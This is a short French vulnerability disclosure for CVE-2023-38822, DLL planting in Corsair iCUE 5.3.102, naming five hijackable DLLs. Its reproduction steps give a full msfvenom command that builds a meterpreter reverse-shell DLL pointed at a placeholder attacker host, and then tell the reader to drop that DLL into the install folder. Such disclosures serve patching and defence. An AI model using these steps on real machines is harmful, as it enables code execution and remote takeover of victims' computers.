Corsair---DLL-Planting-CVE-2023-38822
Plantage de DLL dans Corsair iCUE v.5.3.102 CVE-2023-38822
Découvreur : Idan Malihi
Description
Un problème dans Corsair iCUE v.5.3.102 permet à un attaquant local d'exécuter du code arbitraire via les composants MPDC.dll, CRYPTSP.dll, dcomp.dll, profapi.dll et MSASN1.dll.
Étapes pour reproduire
Pour exploiter la vulnérabilité de Plantage de DLL, un attaquant doit suivre les étapes suivantes :
- Téléchargez la dernière version d'iCUE.
- Installez le produit iCUE.
- Ouvrez le dossier du chemin d'installation, par exemple, C:\Program Files\Corsair\Corsair iCUE5 Software\
- Créez un fichier dll malveillant avec msfvenom sur Kali Linux :
msfvenom -p windows/x64/meterpreter/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o CRYPTSP.dll
- Transférez le fichier DLL vers le chemin du jeu C:\Program Files\Corsair\Corsair iCUE5 Software\
- Exécutez iCUE.exe et obtenez un reverse shell.